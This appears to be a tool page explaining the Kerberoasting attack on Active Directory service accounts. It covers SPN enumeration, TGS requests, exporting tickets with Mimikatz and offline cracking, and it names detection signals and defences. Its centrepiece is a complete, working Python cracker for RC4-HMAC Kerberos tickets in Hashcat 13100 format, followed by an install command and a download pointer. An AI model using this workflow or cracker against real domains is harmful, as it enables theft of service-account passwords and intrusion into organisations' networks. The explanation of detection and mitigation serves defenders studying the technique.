Kerberoasting is an attack technique that lets an attacker recover the passwords of Active Directory service accounts by cracking Kerberos service tickets offline. No logon to the target service is needed, and the password guessing itself produces no network traffic, so the only activity a defender can observe is the ticket request, which looks like ordinary Kerberos use.
How Kerberoast works
- The attacker enumerates the directory for user accounts that have a ServicePrincipalName (SPN) set, using any method: PowerShell, LDAP queries, the scripts shipped with the Kerberoast toolkit, or tools such as PowerSploit. These accounts are the targets because a service ticket for their SPN is encrypted with the account's long-term key, which is derived directly from the account's password.
- With the target list in hand, the attacker, as any authenticated domain user, requests a service ticket (TGS) from the domain controller for each SPN. The KDC issues the ticket without checking whether the requester is actually allowed to use the service.
- Using Mimikatz (kerberos::list /export), the attacker dumps the received tickets from memory and writes them to disk as .kirbi files.
- Once the tickets are on disk, the attacker feeds them to an offline password cracker (for example tgsrepcrack.py from the Kerberoast toolkit, Hashcat mode 13100, or John the Ripper's krb5tgs format). For RC4-HMAC tickets (etype 23) the encryption key is the NT hash of the service account's password, so the cracker hashes each dictionary candidate, attempts to decrypt the ticket's encrypted part and checks the embedded checksum. When a candidate decrypts the ticket and the checksum verifies, that candidate is the service account's plaintext password. Tickets issued with AES (etype 17/18) are far slower to crack, which is why tools request RC4 explicitly; a TGS request with encryption type 0x17 for an account that supports AES is a useful detection signal.
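The offline cracking step described above, as an added example written for this page (it is not code from the kerberoast package or the Kerberoast toolkit). It implements the RC4-HMAC (etype 23) decryption and checksum check from RFC 4757 with the NT hash as key, parses a Hashcat mode 13100 style line, and tries a wordlist against it. The service account svc_sql, the SPN MSSQLSvc/sql01.corp.local, the realm CORP.LOCAL, the ticket contents and the candidate passwords are all constructed for the demo; the ticket is encrypted by the example itself rather than taken from a real KDC.

```python
# Kerberoast offline cracking of an RC4-HMAC (etype 23) TGS ticket enc-part.
# Added example; all ticket data below is constructed, not a captured ticket.
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
TGS_TICKET_USAGE = 2  # RFC 4120 key usage for the ticket enc-part in a TGS-REP


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    # RFC 1320 MD4, inlined because OpenSSL 3 builds of hashlib often lack md4.
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a, b, c, d = d, _lrot((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _lrot((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, _lrot((a + (b ^ c ^ d) + x[r3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    # The RC4-HMAC long-term key is the NT hash: MD4 over the UTF-16LE password.
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _k1(key: bytes, usage: int) -> bytes:
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    # RFC 4757: output = HMAC-MD5(K1, confounder||data) || RC4(K3, confounder||data)
    k1 = _k1(key, usage)
    body = confounder + plaintext
    checksum = hmac.new(k1, body, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, body)


def rc4_hmac_decrypt(key: bytes, usage: int, ciphertext: bytes):
    # Returns the plaintext when the checksum verifies, else None (wrong key).
    k1 = _k1(key, usage)
    checksum, edata = ciphertext[:16], ciphertext[16:]
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    body = rc4(k3, edata)
    if hmac.compare_digest(hmac.new(k1, body, hashlib.md5).digest(), checksum):
        return body[8:]  # strip the 8-byte confounder
    return None


def crack_krb5tgs(hash_line: str, wordlist):
    # hash_line has the Hashcat -m 13100 shape: $krb5tgs$23$*user$realm$spn*$checksum$edata2
    checksum_hex, edata_hex = hash_line.rsplit("$", 2)[1:]
    ciphertext = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for candidate in wordlist:  # one NT hash plus one decryption attempt per guess
        if rc4_hmac_decrypt(nt_hash(candidate), TGS_TICKET_USAGE, ciphertext) is not None:
            return candidate
    return None


def build_sample_hash_line(password: str) -> str:
    # Constructed enc-part for a hypothetical svc_sql account; fixed confounder for determinism.
    plaintext = b"EncTicketPart placeholder for MSSQLSvc/sql01.corp.local (constructed)"
    blob = rc4_hmac_encrypt(nt_hash(password), TGS_TICKET_USAGE, plaintext, bytes(range(1, 9)))
    return f"$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local*${blob[:16].hex()}${blob[16:].hex()}"


if __name__ == "__main__":
    line = build_sample_hash_line("Summer2019!")
    print(crack_krb5tgs(line, ["password", "Welcome1", "P@ssw0rd", "Summer2019!"]))
```

Each guess costs one MD4 and one RC4 pass over the ticket, which is why a GPU cracker runs etype 23 tickets at billions of guesses per second; a strong, long service account password or, better, an AES-only service account is the practical defence.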
Installation
pip3 install kerberoast
Application screenshots
Video guide
You can download the application from here.